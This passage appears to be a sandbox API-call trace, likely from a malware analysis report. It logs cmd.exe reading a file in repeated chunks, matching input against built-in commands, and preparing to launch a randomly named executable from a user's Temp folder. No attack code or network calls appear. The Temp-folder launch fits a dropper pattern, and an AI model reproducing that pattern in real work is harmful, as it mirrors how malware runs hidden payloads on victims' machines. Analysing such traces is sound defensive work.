lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.449] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.450] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.451] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.452] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.453] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.454] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.473] _close (_FileHandle=4) returned 0 [0111.473] FindNextFileW (in: hFindFile=0x3d0f68, lpFindFileData=0x26eea8 | out: lpFindFileData=0x26eea8) returned 0 [0111.474] GetLastError () returned 0x12 [0111.474] FindClose (in: hFindFile=0x3d0f68 | out: hFindFile=0x3d0f68) returned 1 [0111.474] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0111.492] _close (_FileHandle=3) returned 0 [0111.493] GetConsoleTitleW (in: lpConsoleTitle=0x26f344, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.493] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe\"")) returned 0xffffffff [0111.493] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.493] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.493] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.493] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.493] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.493] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.493] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.493] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.493] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0111.493] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.493] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.493] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.493] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.493] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.493] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.493] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.493] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.493] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.493] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.493] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.493] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.494] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.494] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0111.494] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.494] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.494] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.494] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.494] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.494] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.494] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.494] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.494] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.494] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.494] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.494] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.494] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.494] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.494] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.494] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.494] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.494] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.494] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.494] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.494] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.494] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.495] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.495] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.495] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.495] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.495] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0111.495] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.495] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.495] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.495] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.495] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.495] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.495] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.495] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.495] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.495] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0111.495] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0111.495] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0111.495] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0111.495] SetErrorMode (uMode=0x0) returned 0x0 [0111.495] SetErrorMode (uMode=0x1) returned 0x0 [0111.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3e04c0, lpFilePart=0x26ee64 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x26ee64*="Temp") returned 0x23 [0111.496] SetErrorMode (uMode=0x0) returned 0x1 [0111.496] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0111.496] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.499] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", fInfoLevelId=0x1, lpFindFileData=0x26ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec00) returned 0x3d0f68 [0111.499] FindClose (in: hFindFile=0x3d0f68 | out: hFindFile=0x3d0f68) returned 1 [0111.499] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0111.499] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0111.499] GetConsoleTitleW (in: lpConsoleTitle=0x26f0d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.499] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef60, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f028 | out: lpAttributeList=0x26ef60, lpSize=0x26f028) returned 1 [0111.499] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef60, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f020, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef60, lpPreviousValue=0x0) returned 1 [0111.499] GetStartupInfoW (in: lpStartupInfo=0x26ef1c | out: lpStartupInfo=0x26ef1c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp 